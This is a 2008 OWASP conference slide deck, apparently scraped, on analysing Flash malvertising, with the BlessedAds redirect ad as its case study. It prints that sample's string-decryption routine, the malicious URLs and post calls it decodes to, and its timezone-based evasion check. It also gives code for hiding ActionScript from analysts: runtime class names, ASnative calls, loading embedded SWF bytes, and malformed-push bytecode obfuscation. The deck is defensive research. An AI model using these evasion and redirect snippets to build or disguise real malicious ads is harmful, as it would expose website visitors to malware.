Download presentation
Presentation is loading. Please wait.
Published byGladys Atkins Modified over 8 years ago
1
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org OWASP Asia Pacific Conference 2008 The Detection and Analysis of Flash Based Malware Paul Theriault Senior Associate - SIFT paul.theriault@sift.com.au Feb 2008
2
OWASP About me Paul Theriault Security consultant with SIFT (www.sift.com.au)www.sift.com.au Web app penetration tester Code review and developer training Security researcher
3
OWASP Background Flash is a commonly used format for rich media on the internet Flash “Movies” aren’t really movies Application byte-code to be executed by the flash player runtime environment Many websites accept third-party flash content Advertising Networks Gaming Websites (Kongregate, Newgrounds…) Graphic Design/Art sites (Flash Kit, Deviantart…) Others: any forum with SWF avatars etc. 3 rd Party Flash movies may contain malicious code How can you tell?
4
OWASP Talk Outline 1.Flash based malware Background Introduction to malware case study 2.Analysis Methods Disassembly Decompiling Runtime Analysis 3.Counter Analysis Methods Obfuscation & Stack Manipulation Dynamically Loading Content
5
OWASP Flash Advertising Flash has become a common format for web advertisements Advertising organisation must accept third-party content which may be malicious Attacker only needs to achieve redirection of user to malicious site – and Ads are supposed to redirect users! Ads are also often allowed to contact third-party servers for tracking purposes
6
OWASP Rise in “Malvertising” Malvertising: spreading malware by convincing sites to host malicious advertisements http://isc.sans.org/diary.html?storyid=3727 http://isc.sans.org/diary.html?storyid=3727 Major advertising organisations affected Typical method is to force victim to malicious website Old problem, new(ish) vector: http://msmvps.com/spywaresucks http://msmvps.com/spywaresucks www.mikeonads.com www.mikeonads.com
7
OWASP “SkyAuction/BlessedAds/Errorsafe” Malware Seen since March 2007 across many organisations Gained widespread media attention in November with major internet properties affected Fictitious flash advertisement which redirects visitor to malicious website without user interaction Note: Flash file doesn’t exploit any vulnerability Used encryption and obfuscated programming techniques to hide function calls and urls
8
OWASP Analysis Methods
9
OWASP Analysis of Flash Content Flash Overview Static Analysis Bytecode level analysis Actionscript Analysis Focus on ActionScript portions of SWF file Runtime Analysis
10
OWASP SWF Introduction
11
OWASP SWF Format SWF Format Contains images, sounds, video clips AND ActionScript bytecode (ABC) in series of tagged data blocks: File Attributes Tag End TagHeader … 2 Types of Tags: Definition & Control Definition: defines content – shapes, texts, sounds, script etc. and assign them a character ID. Control: Manipulate instances of content (instances of characters) and control flow of the file Complete specification for SWF format available from: http://www.adobe.com/licensing/developer/ http://www.adobe.com/licensing/developer/ (requires registration)
12
OWASP ActionScript Overview Focus on the Tags that contain ActionScript AS3: DoABC AS2: DoAction, DoInitAction, DefineButton2 ActionScript Byte Code Sequence of actions on the virtual machine state Specification for AVM2 bytecode here: http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf
13
OWASP ActionScript Overview
14
OWASP Tools for static analysis Hex Editor Flasm ActionScript bytecode assembler/disassembler SWFMILL Converts swf to xml and vice versa ActionScript Decompiler Flare (AS2) AVMPlus (AS3) – compiled from Tamarin https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Usin g_Tamarin https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Usin g_Tamarin
15
OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self'); FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00... XML
16
OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self');
17
OWASP SWF Deconstructed FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 {“http://www.sift.com.au”, “url”} {} {“http://www.sift.com.au”} {_self,http://www.sift.com.au} {“url”}
18
OWASP SWF Deconstructed XML...
19
OWASP SWF Deconstructed SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00
20
OWASP SWF Deconstructed ActionScript var url = 'http://www.sift.com.au'; getURL(url, '_self'); FLASM frame 0 constants 'url', 'http://www.sift.com.au', '_self' push c:0, c:1 varEquals push c:0 getVariable push c:2 getURL2 end // of frame 0 SWF 46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00... XML
21
OWASP Byte code analysis SWF are usually compressed Look at first 3 bytes CWS= compressed FWS= non-compressed Use ‘flasm –x movie.swf’ to decompress Open SWF in Hex editor Some unusual strings Difficult to read in this format
22
OWASP SWFmill Available from http://swfmill.orghttp://swfmill.org Converts SWF into xml (and xml to SWF) Much easier to read than HEX But very large files 50k malware 6000 line xml Includes graphic data Less information than decompiling, but more resilient to obfuscation
23
OWASP SWFmill Constants pool from malware Difficult to determine where its used in this view
24
OWASP FLASM FLASM is a ABC disassembler Available from http://www.nowrap.de/flasm.html http://www.nowrap.de/flasm.html Describe the actionscript present in the SWF file in terms of Virtual Machine actions: push, pop, add, callmethod, jump etc. FLASM provides lower level analysis, helps with understanding exactly what is going on inside AVM
25
OWASP FLASM analysis Looking at the “Constants Pool” in the malware: constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8', 'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F', 'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956 972D2F50252B6269', 'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3', 'c14', 'c15', '0DB1', 'c16', 'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031 B923C634721342266E62EB8CBB7746D368E0268C2', 'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F', 'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91', 'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833', 'c29', '47ED0203708EE9B0F06B666C9C2317CAA0', 'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice', 'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc', 'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval', 'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe', 'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view' Looks a bit fishy…
26
OWASP FLASM analysis Can also see where its called: push 3, 0.0, 'LoadVars' new push 14688422, 1, r:1, 'c28' getMember push 'color' callMethod Calling a function called ‘color’ prior to calling LoadVars
27
OWASP ActionScript Analysis FLARE (http://www.nowrap.de/flare.html)http://www.nowrap.de/flare.html Decompiles SWF (AS2 only) files to ActionScript Manually trace ActionScript for malicious behaviour Functions which connect remotely Look for strange behaviours Provides much better view of what is going on
28
OWASP ActionScript Analysis Examine where the strange strings are assigned: _root.c1 = '47ED02'; _root.c2 = '46E91A247C'; _root.c3 = '7FF817257C8DF8'; _root.c4 = '50E70523'; _root.c5 = '7FD7153B7080E795EA776F'; _root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5… Now searching for where they are used: (new LoadVars())[v1.c28.color(14688422)](v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422)); So we know it is opening a location, but where?
29
OWASP ActionScript Analysis The String.Color() function is actually a decryption method: String.prototype.color = function (eslogan) { var v3 = eslogan; var result = ''; var v1; var n; var v2; v1 = 0; n = this.length; while (v1 < n) { v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255; if (v2 > 127) { v2 += 848;} result += String.fromCharCode(v2); v3 = (v3 * 52845 + 22719) % 16777215; v1 += 2; } return result; }; Decryption Key
30
OWASP ActionScript Analysis Compile and run decryption algorithm across the mystery variables: c1:getc11:0c22:__tz c2:falsec12:7c23:_url c3:_parentc13:http://c24:substr c4:postc14:0c25:__ftz c5:__click_urlc15:-9c26:__flv c6:http://blessedads.com/? cmpid=master0n c16:0c27:__fchk c7:1c17:http://mysurvey4u.com /stats.php?campaign=mast er0n c28:send c8:0c18:40c29:getTimezoneOffset c9:0c19:master0nintl8112007 c10:1c20:/
31
OWASP ActionScript Analysis Substituting these decrypted strings back into the original file reveals calls: v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=m aster0n", "get"); new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", “_parent”,”post”);
32
OWASP Interesting Classes and Functions (AS2) Global Functions asfunction, ASnative, chr, escape, eval, fscommand, getTimer, getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape Global Properties _global, _level, _root Classes System.capabilities, ExternalInterface, LoadVars, LocalConnection, MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket Functions XML.load, StyleSheet.load, LoadVars.load, LoadVars.send, LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download
33
OWASP Interesting Classes and Functions (AS3) Classes flash.display.Loader, flash.external.ExternalInterface, flash.media.Sound, flash.media.flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer Functions flash.net.navigateToURL, flash.net.sendToURL, flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte
34
OWASP Runtime Analysis Load the file, use proxy to observe (and limit!) network interactions Obviously better to do this on isolated test machine This malware tries to evade dynamic analysis Only connects to malicious website when Movie is loaded via http, AND Local time is a specific value: _root["__tz"] = -(new Date())["getTimeZoneOffset"]() / 60; if (_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://") && !(_root["__tz"] >= -9 && _root["__tz"] <= 0))) {
35
OWASP Advanced Runtime Analysis via debugger Many debug tools are available for flash: fdb (http://labs.adobe.com/technologies/flex/sdk/)http://labs.adobe.com/technologies/flex/sdk/ Ofd-net (ALPHA - http://sourceforge.net/projects/ofd-net )http://sourceforge.net/projects/ofd-net Requires Debug Flash player http://www.adobe.com/support/flashplayer/downloads.html http://www.adobe.com/support/flashplayer/downloads.html For 3 rd party SWF, where do you get debug file (SWD)? “swf2swd.exe” from Nikos Kastellanos (ofd-net author, above url) Also need to enable debugging: UnlockSWF (http://www.buraks.com/unlockswf/)http://www.buraks.com/unlockswf/ However, swf2swd has problems with malformed flash files… work required to develop a robust SWD extractor
36
OWASP Runtime Analysis Issues with Runtime Analysis Difficult to automate Have to execute potential dangerous code Relies on observing external interactions (until debugging tools are more mature) Other Runtime Analysis tools SWFIntruder https://www.owasp.org/index.php/Category:SWFIntruder https://www.owasp.org/index.php/Category:SWFIntruder Erlswf http://pentaphase.de/index.php?/archives/29-Erlang- unscrables-SWF.html http://pentaphase.de/index.php?/archives/29-Erlang- unscrables-SWF.html
37
OWASP Counter Analysis Methods
38
OWASP Counter-Analysis Create Class and function names at runtime Embedding code at runtime Code Obfuscation
39
OWASP Class names at runtime Basic static analysis relies on locating key function and class names Classes can be instanced from strings using: AS2: var myClass = _global['LoadVars']; AS3: var ClassReference:Class = getDefinitionByName("flash.display.Loader") as Class; For example: var f=String.fromCharCode var a=f(76); a+=f(111); a+=f(97); a+=f(100); a+=f(86); a+=f(97); a+=f(114); a+=f(115); (new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');
40
OWASP Function Names At Runtime Works for function names too: var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76))))); _root[v3]('http://www.sift.com.au', '_parent', 'post'); String ‘GetURL’ no longer in the file
41
OWASP ASnative ASnative is an undocumented function Call AS2 functions using reference numbers, as if all functions exist in a spreadsheet Can be used instead of the real function names var escapeFunction=_global["ASnative"](100, 0); Examples: ASnative(253, 7) - [_global] XML ASnative(301, 0) - [XML.prototype] load ASnative(100, 0) - [_global] escape http://osflash.org/flashcoders/undocumented/asnative http://osflash.org/flashcoders/undocumented/asnative
42
OWASP Embedding Code Another method of hiding code is to load the malicious code at runtime However loading code from external site is obvious to runtime analysis Alternative is to embed data within the file and load at runtime One way to achieve this is to use the Display.Loader.LoadBytes() method
43
OWASP Embedding code loader=new Loader(); configureListeners(loader.contentLoaderInfo); //create an byteArray containing our malicious swf var ba:ByteArray=new ByteArray(); var badware:Array= [67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216, 6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,1 37,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29]; for(var i:int=0;i<badware.length;i++) { ba.writeByte(badware[i]); } //load the swf loader.loadBytes(ba);
44
OWASP Embedding code Only remaining evidence is Use of loader class Pushing a massive array on the stack Hiding the use of the Loader class Use dynamic class creation as discussed previously Hiding the data Encrypt/Encode values Embed the values in an image (could also use steganography techniques)
45
OWASP Obfuscation Many techniques available from efforts to secure flash movie source code ActionScript obfuscation Bytecode obfuscation ActionScript Obfuscation Use confusing variable names – numbers and non- displayable characters
46
OWASP Bytecode obfuscation Flash AVM executes bytecodes one by one, whereas decompiler breaks the bytecode into meaningful pieces We can exploit this to confuse decompilers The malicious script we want to hide: var foo="getURL"; _root[foo]('http://www.sift.com.au', '_parent', 'post');
47
OWASP Bytecode obfuscation Converted to action records this becomes constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root' push 'foo', 'getURL' varEquals push 'post', '_parent', 'http://www.sift.com.au', 3, '_root' getVariable push 'foo' getVariable callMethod pop
48
OWASP Bytecode obfuscation Using a malformed push record, we hide the data from decompilers : push ‘junk’ label1: constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root' push 'foo', 'getURL' varEquals push 'post', '_parent', 'http://www.sift.com.au', 3, '_root' getVariable push 'foo' getVariable callMethod pop branch label2 branch label1 label2: Manually change the size of this “push”
49
OWASP Bytecode Obfuscation SWF (Unaffected) 46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 … (Error, but Successful) XML FLASM frame 0 push ??? // unknown push type 23: rest of push skipped label1: // Wild label in the middle of an action, now placed before next action branch label1 pop end // of frame 0 ActionScript
50
OWASP Bytecode Obfuscation This obfuscation technique is documented: http://www.gotoandplay.it/_articles/2004/04/swfProtection.php http://www.gotoandplay.it/_articles/2004/04/swfProtection.php Not a new technique, but example has been seen in the wild. The malware author read this article! The Blessads malware contains strings used in one of the examples on this page Some tools will detect these obfuscations (e.g. Manitu ASV)
51
OWASP Obfuscation seen in the wild Flare Decompile of diepress.com malware http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx // unknown tag 255 length 1 // unknown tag 777 length 3 movieClip 4680 { #initclip function () { for (;;) { return (164 % 511) * 5; var = -785 + (); for (;;) {
52
OWASP Goal of Analysis Analysis to achieve detection Reduce the risk that malicious content is served by your organisation Large reputational impact if malware is even associated with your organisation Limitations: Ad click through targets are controlled by third parties. Cannot prevent attacker modifying the target site to be malicious. Same issue if third party interactions are allowed in the background
53
OWASP Addressing the risk Contractual Controls “Terms of use” approach Complicated chain of supply - federated ads Reactive Controls Mechanism for users to report malicious ads Effective incident response program Technical Controls Need to determine exact program functionality Signal detection problem – malicious ads can be very similar to legitimate ads
54
OWASP What about volume? Even basic obfuscation results in very time consuming manual analysis Advertising organisations are dealing with thousands of campaigns, each with their own creatives Questions to ask: Why would an legitimate add use obfuscation? Why would a legitimate add call certain function calls or class names? Can use automated approach to find suspicious files to be marked for further analysis.
55
OWASP Recommendations Develop combination of automated and manual analysis procedures to increase detection of malicious advertisements Use ad templates to restrict available functionality and make analysis easier Require 3 rd party to provide source code Implement good incident detection and response processes
56
OWASP Questions? ?
57
OWASP SIFT Pty Ltd – Australia The detection and analysis of Flash based malware Paul Theriault [paul.theriault@sift.com.au]
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.